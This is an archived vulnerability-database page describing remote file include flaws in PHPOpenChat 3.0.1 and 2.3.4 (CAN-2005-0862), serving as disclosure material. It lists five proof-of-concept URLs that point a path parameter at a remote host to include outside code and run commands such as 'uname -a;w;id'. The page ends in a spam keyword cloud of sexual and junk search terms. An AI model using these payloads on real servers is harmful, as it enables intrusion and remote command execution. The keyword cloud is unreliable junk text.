about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPOpenChat Multiple Remote File Include Vulnerabilities


Title PHPOpenChat Multiple Remote File Include Vulnerabilities
Published 2005-03-15-12:00AM
Updated 2005-03-15-11:14PM
Class Input Validation Error
CVE   CAN-2005-0862
Remote  Yes
Local  No
Credit  Discovery is credited to Albania Security Clan.
Vulnerable  PHPOpenChat PHPOpenChat 3.0.1
PHPOpenChat PHPOpenChat 2.3.4
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

http://www.example.com/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

http://www.example.com/phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

http://www.example.com/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

http://www.example.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 17:14:25 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
root explo Sexo vagin joomla rem /phppc/pol nayanthara Exploits S freefhqiig Indiansexy sexcome Nakegirls. huyii100.5 kari sweet www..teen sex89 Crack Data Sex arabik keylogger SEXYVIDIO Burning B www.sexygi www.31660. www.554885 bia3x kar2 kuntilanak SEXYVIDIO Powered by t834t SarahBug.c SexBiggirl telugu sex pid 3.0.18 maxcpm.inf maxcpm.inf www.77ling Pns bugil Microsoft% www.serial maxcpm.inf Remote Buf AVIZON.COM www .sexoc linux root love-nepal dmoz.im Www.bangla Exploits S maxcpm.inf free sex t Imagas GET /galle